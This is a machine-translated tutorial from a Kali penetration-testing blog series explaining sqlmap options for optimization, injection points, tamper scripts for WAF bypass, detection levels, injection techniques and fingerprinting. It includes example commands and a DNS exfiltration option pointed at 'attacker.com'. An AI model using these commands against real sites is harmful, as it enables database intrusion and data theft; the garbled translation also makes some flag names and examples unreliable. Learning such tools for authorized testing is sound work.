SQLMAP Automatic Injection
Optimization
"Optimize performance parameters for increased efficiency"
- o: Specify the first three parameters (--predict-output 、--keep-alive 、--null-connection)
--predict-output:
According to the detection method, the ratio of the return value and the statistical table content , reduce the detection range, improve detection efficiency
Detectable return Values: Version name, user name, password, privaleges, role, database name, table name, column name
Incompatible with the--threads parameter
Statistics:/usr/share/sqlmap/txt/common-outputs.txt
--keep-alive:"can avoid the unusual connection very big situation, but triggers the alarm"
Good performance with HTTP (s) long connections
Incompatible with the--proxy parameter
Long connections avoid the network overhead of repeatedly establishing connections, but a large number of long connections can seriously consume server resources
--null-connection:
Get only the size value of the corresponding page, not the page content
Usually used for blind to determine true/false, reducing network bandwidth consumption
Incompatible with the--text-only parameter (True/False based on page content comparison)
--threads: "1 By default"
Maximum concurrent threads
The blinds are each thread gets one character (7 requests <--low ASCII code), gets completed after the thread ends
The default value is 1, no more than 10 is recommended, or it may affect site availability
Incompatible with the--predict-output parameter
Injection
-P:
Specifies the parameters for the scan, except for this parameter, which does not detect other parameters, making the--level invalid
-P "User-agent,referer" #指定此两个参数
--skip:
Exclude the specified scan parameters
--level=5--skip= "Id,user-agent"
URI injection point: "If the name and value of the variable in the URL address are represented by a URL (looks like a directory), you need to manually add an asterisk to the variable (URI and URL)
Sqlmap-u "http://targeturl/value1*/param2/value2/"
--dbms: "Specify the database type of the scan server"
--ddbms= "MySQL"
--os:
Linux/windows
--invalid-bignum/--invalid-logical
Usually sqlmap use a negative number to invalidate a parameter, i.e. id=13->id=13
Bignum use large numbers to invalidate parameter values id==99999999999
Logical using Boolean judgment to invalidate the value id=13 and 18=19
--no-cast
When extracting data, Sqlmap converts all the results to a string and uses a space instead of a null result
This switch needs to be turned on in the old version of MySQL database
--no-escape "Sqlmap By default there is almost no configuration to escape by encoding"
For the purpose of confusion and avoidance of errors, when using single quotation marks to delimit strings in payload, Sqlmap replaces the string with the char () encoding escape method
### Select ' Foo '--"select CHAR (102) +char (111) +char (111)
This parameter turns off this feature
--prefix/--suffix "prefix/suffix"
$query = "SELECT * from Users WHERE id= ('". $_get[' id '] . "') LIMIT 0, 1";
# #如:sqlmap-u "http://1.1.1.1/sqlmap/mysql/get_str_brackets.php?id=1"-P ID
--prefix "')"--suffix "and (' abc ' = ' abc ')
query = "SELECT *" from Users WHERE id= (' 1 ') <PAYLOAD> and
(' abc ' = ' abc ') LIMIT 0, 1 ";
--tamper "Premise: Discovery scan is filtered"
Specifies the obfuscation script, which bypasses application layer filtering, IPS, WAF
Sqlmap-u "Http://dadad"--
#脚本Location:/usr/share.sqlmap/tamper "Dpkg-l sqlmap can be used | grep Tam Filter "
Sqlmap-u "Http://URL"--tamper= "tamper/between.py.tamper/randomcase.py.tamper/space2comment.py"- v 3 # "-V: Show more Information "
Detection "Detection"
--level
Level 1-5 (default 1)
/usr/share/sqlmap/xml/payloads
--risk
1-4 (default 1/harmless)
Risk increased risk of data tampering (update)
--string,--not-string,--regexp,--code,--text-only,--Titles "Specifies the basis for injection based on the type returned"
Page comparison, based on Boolean injection detection, according to the changes in the content of the return page to determine the true and false logic, but some of the page age timescale changes, it is necessary to think that the specified identity is true and false string
Techniques "Detecting the type of technology that SQL injection exists"
Use all technologies by default
B:boolean-based Blind
E:error-based
U:union query-based
s:stacked queries (file system, operating system, registry must be used)
T:time-based Blind
--time-sec
Time-based injection detection response delay time (default 5 seconds )
--union-cols
Default union Query 1-10 column, up to 50 columns with--level increase
--union-clos 6-9
--union-char
Union queries use NULL by default, and in extreme cases null may be invalidated, at which point the value can be specified manually
--union-char 123 "Web application needs to be analyzed in advance"
--dns-domain
Scenario : An attacker controls a DNS server and uses this feature to increase data extraction rates
--dns-domain attacker.com
--second-order
The result of a page injection, reflected from another page
--second-order http://1.1.1.1/b.php
Fingerprint "Fingerprint Information"
-F,--fingerprint,-b,---Banner
Database Management System Fingerprint information
DBMS, operating system, architecture, patches
Small white diary 45:kali penetration testing of Web infiltration-sqlmap automatic Injection (iii)-SQLMAP parameter details-optimization,injection,detection,techniques,fingerprint